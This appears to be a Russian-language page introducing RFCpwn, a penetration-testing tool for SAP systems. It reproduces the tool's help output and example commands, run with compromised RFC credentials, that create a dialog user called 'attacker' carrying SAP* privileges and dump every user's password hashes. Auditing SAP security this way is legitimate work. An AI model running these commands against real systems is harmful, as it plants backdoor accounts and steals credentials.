Набор инструментов для перечисления и эксплуатации SAP с использованием вызовов SAP RFC
Это набор инструментов для демонстрации влияния взломанных учетных записей служб.
Этот PoC не предназначен для использования в производственных средах, т.к. он без гарантии стабильности или поддержки.
RFCpwn использует pyrfc и библиотеки, предоставляемые SAP по адресу: https://github.com/SAP/PyRFC#installation
usage: RFCpwn.py [-h] [-debug] [-ip IP] [-u Username] [-p Password]
[-c Client] [-s Sysid] [-ping] [-enum] [-usercopy]
[-user USER] [-copy COPY] [-pw PW] [-dump] [-exp]
An Impacket style enumeration and exploitation tool using SAP RFC calls
optional arguments:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
Authentication:
-ip IP <targetName or address>
-u Username RFC Users Username
-p Password RFC Users Password
-c Client Client- eg.000
-s Sysid System Number- eg 00
-ping RFC Ping Command
User Abuse:
-enum Use to enumerate a specific user
-usercopy add a Dialog User
-user USER Required for -usercopy and -userenum to specify the user
-copy COPY User to be copied required for -usercopy
-pw PW password of new user for -usercopy
Hash Collection:
-dump Dump hashes use with below
-exp EXPERIMENTAL - Dump BCODE / PASSCODE hashes
Содержание
Примеры
Ping – подтвердить подключение
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -ping
Скопируйте права пользователя в новый диалог пользователя. Если -copy не указан, используется SAP *.
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -usercopy -user attacker -pw changeme1
Дамп хэшей всех пользователей. опция -exp для экспериментальных хэшей bcode и passcode.
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -dump
Дэмо
Скачать RFCpwn
¯\_(ツ)_/¯
Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.